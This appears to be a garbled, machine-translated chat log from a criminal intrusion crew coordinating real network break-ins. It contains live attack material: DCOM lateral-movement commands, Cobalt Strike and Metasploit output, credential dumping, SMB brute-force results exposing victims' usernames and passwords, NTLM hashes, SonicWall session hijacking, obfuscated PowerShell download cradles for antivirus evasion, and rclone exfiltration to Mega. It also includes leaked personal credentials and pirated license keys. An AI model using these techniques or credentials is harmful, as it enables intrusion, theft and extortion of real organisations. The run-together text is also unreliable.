``the analogue of the command logonpasswordsProtect the mimic in the offline in your own place Can you just dump the lsass? tokens ideally What do you want to find on these PCs What's the purpose? tried AV eats them up so tried this methoddll ehe throw it there yes there are Detects if you can build - you already built, it seems there is an internet?there is a caveat that there are five hosts where there are the craps on 3 it jumps on a simple jumper but to two not although smb login shows okv1.0/Pourchell.exe - is it there? and also show the full command I'm afraid it will stalify kaspersky like aaver what is it on the machines where you want to jumper? hiSalut can someone check if the command is written correctly
``powershell [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.1.6.7")) .Document.ActiveView.ExecuteShellCommand("C:\windows\system32\windowspowershell\v1.0\powershell.exe", $null, `` then I insert the code generated by the code ``.
then i get error : could not spawn (token): 87
 run net helpmsg 87
[*] Tasked beacon to run: net helpmsg 87
[+] host called home, sent: 32 bytes
[+] received output:

The parameter is incorrect.
Question:
Is it inserted as an argument? How should I close it ? with double quotes or without ? Or is there something else I'm missing ?
   This method of jumping to a neighboring host (with the disclaimer that classic jumps don't work there)
 is described in this article:
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
If you do not know how to jump to a neighboring host, it is possible to jump to a neighboring host using this method. there if you get up to the system, you can run responder\inwade and fiddle with network hasheshere vorkgrupp machines were as in the local oneweb scanner run and through sockets to 80 443 8080 8443 portshttp://github.com/NetSPI/PowerUpSQLeshe mssql remout attack look at https://github.com/Ridter/cve-2020-0688schevspomniloda, ms17 all scannedsmart auto burente can tryms17 no sense to repeat? Salud guys. Here's a question. Share what script someone uses if the session from the network with a user who has privileges little more than the "printer". Immediately stating that the standard methods are tried, no tokens, siattbelt, does not work as well as any other command "execute-assembly" (Failed to load the assembly w/hr 0x8007000b) ball where to move this user too no. Access to the system folders is closed.  In the process from the system inject too can not do. In general, I am interested in what you do in such cases. The question is of a general nature, such here is the "hard cases" as the second is not budetotpisyat here is not necessary
Gentlemen #teamleaders let those who understand badly the first time I really hope that it will be understood and taken@all gentlemen, friends and colleagues
I'm sick and tired of being a fucking babysitter for everyone
specifically here is a very detailed report and the result of the downloaded data which WE all need for the trades to get the most out of the work
the next group that will ignore it in itself will choose responsible person who will be punished with a ruble or forever excluded from the work process, everyone has a nerve - I have a lot, but I also have a limit of certainprincelunaATXBugsambaasdf7f814vycfas is anyone msf at hand where armitage can be legitimate? GruzuPars hi, please send, who has a video Fast Guide + textbook from there[ ](https://stylebrooks.com/group/general?msg=Rk5cnaLJFZKrSRNAY) if this NTLM LM hash then cmd5.org
cheeks in lichkene for what thanks, man)@VasyaPypkin F22F154A1307A6D7C523E55BAB861365 Locmis2003 guys have any power? need a script F22F154A1307A6D7C523E55BAB861365privet myself almost no work sitting, puzzle me?almost no business yourself? you got something for me? hello@hitech hereATXBugsambaasdf7f814vycfas the first two +- junk, just convenient, look at the third imhomskl !=muscle
we have to try and find his computer and he may have the craps somewhere
either in the balloons or in the DEV zones haven't found them yet but on the desktop and in the password manager everything will be fine + take over the computer of the SL developer / sys admin is not a problem right? it's worth a look in the configure applications to see if there is a DB / hostname you want to connect to in the admin_computer. if not then ... ugly linux creds != creds to the database and musl kmd under the current context not found you can account YES module in msf mysqql_ѕql if you already have the rights raised soPowerUpSql the most buzzing talkkit to work with whineshttp://github.com/FortyNorthSecurity/SqlClient
https://github.com/uknowsec/SharpSQLTools
https://github.com/NetSPI/PowerUpSQL - !!!!!!
right in the cob - nofat32039482753QQ I already went to the admin he sleeps at nightdon't want to complicated I don't want to removed you about the MCF, what about the chromataova - I tried it was the same as what?module to remove the session on the msf not throw achet drizzling) ok at night I'll go directly) there will be a log is not fat will be da space I think it is unlikely or not there is no space ... change 2 to 10 ``ERROR: Unable to write to the file. There may be a disk or file system error.
File C:\ProgramData\AppBkUp2.reg already exists. Overwrite (Yes/No)?
{`Diroux changed``ERROR: Unable to write to the file. There may be a disk or file system error.
The operation completed successfully.

The operation completed successfully.
If not, just go to the night I'll report the results I have not reached the logger yet if very necessary dll eh I can find it I have not used in kobalt there is a keylogger I think I'll run it I'll report and that's all I can do with them i have keyloggerstyler can be a linux conquestBro all on mazia kipass some nyetyuoswatchesharyyouwould chrome inspected and needY) from kontex useagada and kredy will go) he where he keeps a passHow to run the script and all?i don't know how to get the session and the credits from the patti, what's the problem? is there a session with the procs or not? do you have a cobalt dll or will it get annoying?
[+] Determining what AntiVirus is installed...
[+] host called home, sent: 267422 bytes
[+] received output:

PID|Name|Path


Windows Defender AV Signature Version:
1.259.1455.0

AV Name|Version|Install Date


[+] received output:


displayName : Trend Micro Apex One Antivirus
pathToSignedReportingExe : C:\Program Files (x86)\Trend Micro\Security Agent\TmListen.exe
Timestamp : Tue, 15 Sep 2020 15:31:55 GMT

displayName : Windows Defender
pathToSignedReportingExe : %ProgramFiles%\Windows Defender\MsMpeng.exe
timestamp : Mon, 15 Jan 2018 22:15:39 GMT
``Which one is it?'' I'll write to you via invoke the hash thank you I'll try to fuck with the context of the user but I'm not sure if that's it or not I have it written down
@echo off
REG EXPORT "HKEY_CURRENT_USER\Software\SimonTatham" "C:\ProgramData\AppBkUp1.reg"
REG EXPORT "HKEY_CURRENT_USER/Software/Martin Prikryl" "C:ProgramDataAppBkUp2.reg"
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" "C:\ProgramData\AppBkUp3.reg"
``````putty HKCU\Software\SimonTatham\PuTTY\Sessions
    	        recursive search for *.ppk up to 3rd level in
                %USERPROFILE%\Documents
                %USERPROFILE%\.ssh
                %USERPROFILE%\Downloads
              HKCU\Software\SimonTatham\PuTTY\Sessions
``Scha sekreds pomoymu pomoymu wyść registryPutty is zhutocni aver whatdr_qenuPutty at the admin is open and he authorizajte komputer admin - there putty.  All searched - no credits. In MSF session does not come - cut AB ( wanted through MSF with putty to work)
Question - do we have any solutions to get the credits from the putty? Stiller or something else? a couple of new tricks can be foundmikecook thanks, I will look at examples to portscan cobalt, an error in syntax probably add ` ``icmp 1024
``Hi all!
beacon> portscan 192.168.0.0/24 445
[*] Tasked beacon to scan ports 445 on 192.168.0.0/24
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete

Why can this happen? The scan is finished at once
the range is exactly the same on the forum at once) the service stack of DB processes etc.
For loca mauntom if suddenly :) well freshcdll under on def works from under kmd (without cobalt)
likely there is a client outluk, preferably not trial? there seems to be, but it's like putting in the trash and there is no simple option to delete? cloud backups on viam who tried to crush? account got. and how to delete? overwrite want to try but mb have an alternative? threw keys, all activated, cp) ``PLZ92-LYS8J-ANV3S-SZRQ7-GPG3F
5JZ6S-B3FKJ-49YYP-HCCQN-3JVHX
TQZVQ-X36SC-SFZYC-TAC7E-BQF9S
2VZ8M-BYC2A-A3Y3P-6LQQ5-HNDN8
CJZXN-BWFDK-Q2Y2M-VSFCT-E7YLW
6KZ2V-A2UXK-YAWWC-YJ9QG-MW4RG
RSZXG-M2YDB-R5SWQ-3XR7Z-L42PN
ULZCW-2YQNG-FL83G-9DGLR-9TFQA
oh well, now I'll try it) lay on picaboy did so at least, the key got up without a fuckin' google and type in mb who knows where to get it? anyone purely by chance do not have the key to the face proxyfire?[ ] (https://stylebrooks.com/group/discussion?msg=5auyX86kHct2PnDik) gotchaThere is no such thing on this network, subconsciously immediately started looking for the new bookmark))) @ali please quote the message and not reply in the subject (the button to the left)
there notifications have to closeObviously i have the ability to create bookmarks theredanu it turns out his computer is asleep just yet, if i do not kick it happy, and just do not connect? i eleventom first made a system session and it already injected with another account may try but you "kick" the user will if he bookmark only on his workstation new artifact kit, all in the system does not migrate session from the admin * NetExtender Clients
put, yes 2fana, no you have 2fa yes? tShow bookmarks > there's no new bookmarks?
Alarm Trying to connect ...
There is a problem connecting to this machine, please check it... The client could not connect to the remote computer. Remote connections might not be enabled or the computer might be too busy to accept new connections. It is also possible that network problems are preventing your connection. Please try connecting again later. If the problem continues to occur, contact your administrator.
``Work PC there what? I can't find where to add this tab. It feels like there's no such option in Sonicleave RDP
i'm logged in there without any credentials
I don't remember exactly but it was intuitively clear create new bookmark once redirected to the portal, but there was no bookmark to connect to the PC
Same way, if you want to make a new bookmark go straight to this SMM. Try to make a session under another cookie, it doesn't ask me how, it tries to set connection to 127.0.0.1:8877
the connection is made from your ip to the sonic gateway and then to the virtual desktop (or physical host) the SMA should be just put on the dedication and it will connect through the localhostsorrie, confused with NetExtender Clients

in SMAConnect there proxy I enter: target ip, port 443, creeds?
I did and then I do not know what to do) they are fresh, here we had this, as I understand it sessions died justThrough him enter creeds, 2fa sendsThrough him try to enter was secur mobile accesses client? SonicWALL

- encoding the session ID in base64
```
>> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- I put in the URL `https://target` (redirects to https://target/cgi-bin/welcome)
- I add a cookie to the console
```
document.cookie="swap=NDdaakZLeDI0TmoyaDBVdFpLWDJWDPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- In the browser (where .../cgi-bin/welcome) I edit the URL to `https://target/cgi-bin/portal`
- It takes me back to the page `https://target/cgi-bin/welcome`

so for all three sessions in the Target
one session once redirected to the portal, but there were no bookmarks to connect to the PC

Anybody had problems with this? what did you do next? @rozetka @t3chnolog thanks for your help) everything started, "went ore)) "on port 80th https raise or 8443 maybe even cobalt to roll up and try it now you can just pull jobs with socks and start with another router-repawn sessions do shorter I think you have a bad configured router `tcp 0 0 185212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby I thought it was fucked up) it's a server with a msfu no external IP? are you behind a NAT or something? interface to your provider's LAN andmeterpreter > ipconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1


Interface 65539
============
Name : Microsoft Hyper-V Network Adapter #2
Hardware MAC : 00:15:5d:79:a8:19
MTU : 1500
IPv4 Address : 172.30.100.175
IPv4 Netmask : 255.255.255.0jobs -k number Print the socket list, take them all out and start one from the session you want mask /8 for 10.0.0.0 subnet only e.g. 172.8.240.5 what you have specified may not be recognized as a local address at all
10.0.0.0 - 10.255.255.255 (the subnet mask for classless (CIDR) addressing: 255.0.0.0 or /8)
100.64.0.0.0 - 100.127.255.255 (subnet mask 255.192.0.0 or /10) - This subnet is recommended by RFC 6598 for use as Carrier-Grade NAT (CGN) addresses.
172.16.0.0 - 172.31.255.255 (subnet mask: 255.240.0.0 or /12)
192.168.0.0 - 192.168.255.255 (subnet mask: 255.255.0.0 or /16)
```
wikipedia if the second then you first put it ``172.0.0.0/8`` this strange? or ufw disable this one google local network masks then ``72.0.0.0/8`` your subnet mask is still strange, you know? add <subnet> session number what port forward and rules in ufw ``
IPv4 Active Routing Table
=========================

   Subnet Netmask Gateway
   ------ ------- -------
   172.30.0.0 255.0.0.0 Session 3
   172.30.100.0 240.0.0.0 Session 4
``route print show the socket should look in the router specified? port fwd is another and also does not go any port forwarding on the server do not do? like this add 172.30.100.0/4 4 or tryroute add 172.0.0.0.0/4 4route add 172.0.0.0/8 session 4172.30.100.0/24 and as a router prescribed in what diap should "watch"? What I forgot to miss?
1) there is a session on the server in the coba it is not spawned
2) on the server to run sox to the local host can look into the network
What has been done : I prescribed the router
```
IPv4 Active Routing Table
   ------ ------- -------
   172.0.0.0 255.0.0.0 Session 4

```
2) Sox started : the port on the server opened and is listening
```
msf6 auxiliary(server/socks4a) > set srv
set srvhost set srvport
msf6 auxiliary(server/socks4a) > set srvhost 185.212.129.112
srvhost => 185.212.129.112
msf6 auxiliary(server/socks4a) > set srvport 1000
srvport => 1000
msf6 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf6 auxiliary(server/socks4a) > netstat -antp | grep 1000
[*] exec: netstat -antp | grep 1000
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
msf6 auxiliary(server/socks4a) > netstat -npl
[*] exec: netstat -npl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 185.212.129.112:300 0.0.0.0:* LISTEN 555/ruby
tcp 0 0 185.212.129.112:305 0.0.0.0:* LISTEN 30554/ruby
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
```
UFW disable

I prescribe in the proxychains ip server port, trying to ping hosts from the network are not pinged.I do not know well, but mba tipsPlease write to lsnu or mba someone knows regulars (although I do not know whether this issue can be resolved through regulars)anyone worked with databases maile:pass or similar bases for the brute force? data from the sharepoint / office 365 has already mastered someone to drag? which time I met that they store dokichom vssadmin not suitable?
I did a snapshot, took everything, removed it, no traces, except logs)stewartThank you.https://github.com/zcgonvh/NTDSDumpEx@t3chnolog got it, thanks!
i can recommend some other software for the dekrypt, please?
https://github.com/Dionach/NtdsAudit/issues/3Господа, has anyone encountered this?
I just downloaded `ntds.dit` and `SYSTEM` via `psexec_ntdsgrab`, then I try to use NtdsAudit, which throws the following error `Database was not shutdown cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.`oki :thumbsup:alter soon release@rozetka [ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=penxyGkywNSHc7x64) hi, where did you add it?
fuck
fill it up and I'll delete the conf.
Nothing's been added. Maybe a filter by IP region? `Error: Permission denied.` Whatever, valid account or neta via web?I've tried 10 crescendos - the same Thanks for the advice, but after 3 hours, another error pops up: it may also be that a person with these crescendos are already registered as an active user with a session and you do not give it to knock out the availability of a VPN only on weekdays / certain hours, and a ban on work on weekends? guys, who faced with this?
port 443 is open, the ip is pinged, if I enter the wrong credentials, the VPN will say that the credentials are wrong
Debug log says `msg="SSLVPN tunnel connection failed"`.
Yesterday everything was fine, reinstalling Fortik did not help
Today it's uploading
Please, who is free, or who can do today's work for tomorrow, please tell me
on the "fresh" bots need to raise the rights and jump to fix the normal
PM me immediately with where to pass
´´I´ll give it to you gentlemen,´´
you write that you have nothing to work with then at 22 mc no one to take the bots?) right now, load the fresh bots with a fever, write to pm right away with where to pass the work? mm-hmm) well, you there careful krCH) in general, amsi does not give a fuck about obfuscation, it looks at the code execution after deobfuscation, ie. it looks for code execution after deobfuscation (i.e. after dll startup it seems to me)) if the network plus or minus adequate people manage it then most likely there is a simple notification and you will be scooped now) funny us)) before that all dlls and .exe were palyzed) even if there is no amsi and av does not paly inside verashell - the verashell process downloads something from the net causes suspicions
but when there is an amsi (and on server 16 it is) it's a fucking miracle you did not fuck up)well you're fucking lucky) most likely cilance is not fucking configured Version: 10.0.14393 N/A Build 143932016 server OS version where bypassed you?it's possible, but you got bypassed) dll is clean not knocked out I'm talking about regular servers, where even amsi not a lot of triggers you claw spoiler - for downlaid string you on the fuck any normal EDR at the top and bottom of the code `powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code`
you can throw in garbage code, saves you from some avs,Enter `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("here is your code that we saved powershell ....."))`
An example of what mine looks like: `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://domain.com:443/updates'))")")
notice the quotes above ""IEX and at the end ")"")) is how you should put the quotes
Click on Run Script green icon as in the screenshot
At the bottom, copy the encrypted code, in my case `cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA==`

Create a new .ps1 and insert
`powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code`,
an example of my code:
`powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA==`

Done, try) - here, where "/ups" put anything, you can not do 2 times with the same name, made c "/a" the second time you have to change the "/a", such as "/ab", etc.
- Local Host (your domain)
- Local Port (it should be 443)
The rest as in the screenshot, check the box and click Launch.
A code will pop up, for example: `powershell.exe .....`, copy it, save it somewhere a well this dns yes(Get-ADComputer -Properties ipv4address, lastlogondate, operatingsystem -Filter {enabled -eq "true" -and OperatingSystem -Like '*Windows Server*'})I remember ??? everybody guys, here I am again, problems with internet solved:metal:sonargoldner.com throw me an invite to the conf:thumbsup:everything works, sorry for the confusionIt turns out you can watch which files are "busy" remotely:v:thank you =)` `apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql

change the root password
passwd root



curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall
./msfinstall

Then edit this file
nano /opt/metasploit-framework/bin/msfdb

Comment on the lines
# if grep -q kali /etc/os-release; then
# echo "Metasploit running on Kali Linux as root, using system database"

Save and get outmprimetrivo)manual on the set of msf who have left? =)Likewise!:thumbsup:hey guys, happy new week :metal:I will not extend the total cobalt serve anymore. who has something there - take it away. will go out the other day :) zdarovsem helloDid anyone have a friend or the opportunity to pay the bill Paypal or CC white account? $200 account to pay. PMa next already pg Up pg Dnv tmux ctrl B + [screenshot . what fly toldaa you can somehow work without tmux but not in this case small agree in small texts can help)and expand the window to the maximumCtrl + Minusprobowal yjene pomogaet the bottom leftstrl I os Kalilinukste buttons are slightly different)not, the bottom left corner of the screen is the same as the bottom left of the screen and the arrow up ( tmux ) is an analog of tmux but there are no such problems use screenpage upctrl + banda hey everyone, my question in the msf through tmux command result did not fit in the screen, is it possible how to scroll up, or tmux does not have enough native memory to save such a volume of information?hammer-all sorted out)apparently this software takes the polzak from the AD and passes to them this commandScript without a list of users differs only in two things.
	- psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5daeto what kind of software? smart auto brute force?
[+] received output:
[+] Success! Username: parag.sharma. Password: fusion@1234

[+] received output:
[+] Success! Username: tanuj.sharma. Password: fusion@1234

[+] received output:
[+] Success! Username: mukesh.nagda. Password: fusion@1234

[+] received output:
[+] Success! Username: rajendra.chundawat. Password: fusion@1234

[+] received output:
[+] Success! Username: rajan. Password: fusion@1234
``````
By smb brut set the names of a list of domain administrators Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin administrator avinash.kumar
Thank you for the rest is empty hash or decrypted allfpeuser 1130 thank yousek any of the elders, can you let the brute force? steven is not here

```Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fpeuser:1001:aad3b435b51404eeaad3b435b51404ee:78c026df2a8b5b9c5790b2ec76b51399:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5163658e468b00a5a328bbcceb2d9867:::
``and write a rota for the 2nd sessiondid the session in it vas local ipacs no 1 session is not your virtual ? )session alive ?sessions -xroute add 10.81.0.0.0/8 1rooting you in another diap were runroute add 10.0.0.0/8 1 into the studio print
ortionsHi will try)I will be gone for a couple of hours, hold on! Output aquatone in
``user@kali:~$ aquatone-discover -d ess.com
                           __
  ____ _____ ___ ______ _/ /_____ ____ ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/ discover v0.5.0 - by @michenriksen

Identifying nameservers for ess.com... Done
Using nameservers:

 - 173.201.72.45
 - 97.74.104.45

Checking for wildcard DNS... Done

Running collector: PublicWWW... Done (0 hosts)
Running collector: Riddler... Skipped
 -> Key 'riddler_username' has not been set.
Running collector: Netcraft... Done (0 hosts)
Running collector: Threat Crowd... Done (5 hosts)
Running collector: DNSDB... Done (0 hosts)
Running collector: Wayback Machine... Done (54 hosts)
Running collector: Google Transparency Report... Done (10 hosts)
Running collector: PassiveTotal... Skipped
 -> Key 'passivetotal_key' has not been set.
Running collector: HackerTarget... Done (2 hosts)
Running collector: PTRArchive... Error
 -> PTRArchive returned unexpected response code: 502
Running collector: Certificate Search... Done (11 hosts)
Running collector: Censys... Skipped
 -> Key 'censys_secret' has not been set.
Running collector: Shodan... Skipped
 -> Key 'shodan' has not been set
Running collector: VirusTotal... Skipped
 -> Key 'virustotal' has not been set.
Running collector: Dictionary... Done (8210 hosts)

Resolving 8258 unique hosts...
104.17.134.180 artcontest.ess.com
52.96.69.56 autodiscover.ess.com
3.215.239.59 blog.ess.com
96.248.123.101 conference.ess.com
96.248.123.102 connect.ess.com
72.167.218.45 email.ess.com
3.215.239.59 ess.com
3.215.239.59 ftp.ess.com
35.174.78.146 go.ess.com
104.17.132.180 library.ess.com
52.112.65.78 lyncdiscover.ess.com
104.17.133.180 refer.ess.com
34.200.47.197 resources.ess.com
52.112.67.51 sip.ess.com
3.215.239.59 static.ess.com
96.248.123.101 telecom.ess.com
104.17.136.180 together.ess.com
96.248.123.99 vpn.ess.com
3.215.239.59 www.ess.com

Found subnets:

 - 3.215.239.0-255 : 5 hosts
 - 96.248.123.0-255 : 4 hosts

Wrote 19 hosts to:

 - file:///home/user/aquatone/ess.com/hosts.txt
 - file:///home/user/aquatone/ess.com/hosts.json
``Put cali linux and aquatone in it. To search for subdomains :: for webshelf srolling \ search for VPN domains etc.
I'll roll out the tools and who needs it - PM by the way, yes, conveniently rocket portable from portable app and you'll be happyrocket this web app
they all have the same style of push notificationsHowever. it could be rocket's foxyproxistil blew up in the browser is fiancé who hasn't had this fucked up? hi.
You're welcome.oh spsdate someone coba 4.1kGirls, here's a tip for anyone who works with networks ::
When you have a network with rights - if possible make yourself on other machines (preferably server tc they work 24x7) several sessions. If you reboot the centralpoint machine with a session, you can come back to the network without wasting teammate time and do not have to wait for them to bring up your session.
=)hello! we're in cteamhai:vulcan:everyone how slow the time goes:confounded:@all
brothers and sisters, does anyone have any experience locating nix?
of particular nix servers (ubuntu, debian)
have a couple of questions @brandon here, and if anyone else needs, just gently, gentlemen.
```
Cecilia:Marquez:ranthank@mail.ru:r5SDrcedwe:ii5HBUAR
``Hi! welcomeFriends, hi all ! Does anyone have an account in linkedin ?@all have a new fix for IIS as a native module for IIS, FUDprivet writePartners! Hi all, help is needed. On sonic, please let me know who can help. ThanksNo)ralfhacker?[ ](https://stylebrooks.com/group/general?msg=Dri2mZ7FuE8h8bR5r) bqhost@exploit.im
200$
Xeon E5-2620; 16GB RAM; 16TB HDDu 2012 servaks very often have problems with rclone,3-4 mbps with a possible 600mbit,it would be desirable to find a solution to fix it,as on 2019 servak all finehttp://www.cherryservers.com/pricing/dedicated-servers```
E3-1270v6
48GB RAM DDR-4
1TB SSD
7x4TB HDD
$700
``[ ](https://stylebrooks.com/group/general?msg=Dri2mZ7FuE8h8bR5r) with expa from tun took.skien loyal hosters from whom you can take normal servers under the date for many tb for the bits
hostboss - do not offer!!! reseller... at most under the coba takeGreetings
What is the correct way to unload info from the mega, directly or through the cake?
1vpns.comdoublevpn.com guys, nakidayte please where double vpn through bitok you can buy, only verified, that the norm worked all by itself substitutedtmostmost domain itself I wrote - without https[ ](https://stylebrooks.com/group/general?msg=XkRWjCHQEiWHgMTX7) check-sonik.exe 107.0.27.225 C:\.....\sessions.јonv lx file @cod.ru it means different today used sonik checker - everything was o```
beacon> shell check-sonik.exe https://107.0.27.225 C:\.....\sessions.json
``[ ](https://stylebrooks.com/group/general?msg=64Fsi6zzMB9PsoCwr) show the command as written@all those who are out of work - please let me know, there are free vpnvs all hello
@Code sonic checker stopped working?
```
During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "requests\adapters.py", line 439, in send
  File "urllib3\connectionpool.py", line 755, in urlopen
  File "urllib3\util\retry.py", line 574, in increment
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='https', port=443): Max retries exceeded with url: //107.0.27.225/cgi-bin/portal (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x000002057B097D90>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed'))

```
https through the browser all ok by the way, also a question, I unloaded through the browser to the mega, at one point came the message that the account in the lock, no activity on the cars, where I sat on the htp was not observed, no one to connect (although for the shadow connection on htp not responsible), what can be ? how lock the mega ? in the browser in private mode, I worked, ie, leave a trace - did not leave an error invald user_idvot exactly, I tried to go to the guide, did not work for me.i.e. to leave a legacy - did not leave a legacy error invald user_idvot exactly, make friends with pklon, I tried to go by the guide, did not work for me it is so we know) Well, as if not )https://rclone.org/docs/всем hello guys, the question is, has anyone tried to make friends with anything other than the mega, namely, with some analog of the mega, such as pcloud ? If yes, can you write off in lieu, because i can't get it right hello all, tell me how to see the log of deleted files in the line? @all if you need to remake sonics - call me in the appropriate confudr For those who work with nix very useful link in fact) did not even know that through the service controller and remot register can remotely execute commands @all
https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html
i suggest those who i have not downloaded it yet it will not show debug with normal outtup, and i wrote -vtry to change it to true, it may give some more useful information that will help solve the problemstrangely enough your outtup with debug appears when you have debug = false in configvot the whole config[remote]
type = mega
user = user
pass = pass
debug = false
hard_delete = falseIt looks like a junkie when it executesmaybe there's a problem in the config maybe the slashes are duplicated because it's shielding them or maybe the above is the log it writes when it's normal? well, that's the funny thing, they are duplicated
I duplicate them - they are in a normal form, but writes that the path does not find and does not download at allMaybe the trick is that the slashes are duplicated? guys, who caught this anomaly?
C:\ProgramData>rclone.exe copy "\\\HOUNAS01\Data\Projects\temp\data.zip" remote:D
ata -vv --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 1
2
2021/04/05 06:36:02 DEBUG : rclone: Version "v1.53.1" starting with parameters [
"rclone.exe" "copy" "\\\\HOUNAS01\\\Data\\Projects\\temp\\\data.zip" "remote:Data"
"-vv" "--ignore-existing" "--auto-confirm" "--multi-thread-streams" "12" "--tra
nsfers" "12"]
2021/04/05 06:36:02 DEBUG : Creating backend with remote "\\\\HOUNAS01\\\Data\\\Pr
ojects\\temp\data.zip"
2021/04/05 06:36:02 DEBUG : Using config file from "C:\Users/action.a\.config
\\rclone\\\rclone.conf"
2021/04/05 06:36:02 DEBUG : fs cache: adding new entry for parent of "\\\\HOUNAS
01\Data\\\Projects\\temp\\data.zip", "//?/UNC/HOUNAS01/Data/Projects/temp"
2021/04/05 06:36:02 DEBUG : Creating backend with remote "remote:Data"
2021/04/05 06:36:05 DEBUG : data.zip: Need to transfer - File not found at Desti
nation
writes that the file will not find, and after a minute begins to download it for himself, but the problem is that the download is about 300-400kb per second, but the server can hundreds of times moreAhave anyone batchnik adfind in which the dop removes enum_ad?
And explain someone please how to work through targets c ssh, at least in brief
car with info 3389 is closed psexec and winrm not pulled inside the mega I have not changed anything, no restrictions on download speeds in what sense? On remote normal speed? Maybe someone has experienced slow copy in rclone? speed in speedtest is great, but rclone maximum eats 2-3 MB, do not play with transfers and trades also can use -m0-5, where 0 - no compression, and 5 - the maximum compression
-r recursion
Passwords -p123 put the password 123 `"C:\Program Files\Winrar\Winrar.exe" a -tn180d "\PATH\TO\RAR.RAR" "\PATH\TO\ARCHIVE"` put all files in the archive under the name RAR not older than 180 days (all that older 180 days are not uploaded) bros welcome!
Advise current method of crypto psh.
I knew one, but it is now for some reason does not work.
I took an pch, put it on pastebin made a raw link and paste it in the command
iex((new-object net.webclient).downloadstring('https://pastebin.com/raw/RjWXyfCW'))
ran it through ps1, it converted it from 7627 to 250 characters, added the resulting code to
powershell -nop -w hidden -encodedcommand .....
And got a short string that pulled the cars through the kmd without defender detection and aveshek, also worked through wmic
Found similar sites where there is raw but they do it with a script and the session does not come.
Hi all)atomhashersarmAirspoonin googledefault url pure-storageHowdy all, has anyone come across in work with the addition to veeam backup & replication called pure-storage ?
Veeam settings show that storage is local not cloudy, on my network hostname is pinged, portscan shows 22/80/443/open ports
When trying to connect with my browser I get a "deadlock", even though it is called pure-storage login, but I do not see any window to enter the credentials.
screenshot for clarity may someone remember the logo WatSon look
i thought there +- same checks by sploit check for 10 sploit + according to the description it's charnAnna build dLLeasone> dazzleUP
[-] Could not find reflective loader in /home/user/apps/Cobalt_scripts/dazzleUP-master/dazzleUP_Reflective_DLL.dllhttps://github.com/hlldz/dazzleUP
Not checked yet. Fury[ ](https://stylebrooks.com/group/discussion?msg=SkMtKMomvuMa5Sgeu) it often happens with Fortik, the solution is to get some of the simplest rdp's in us and eu
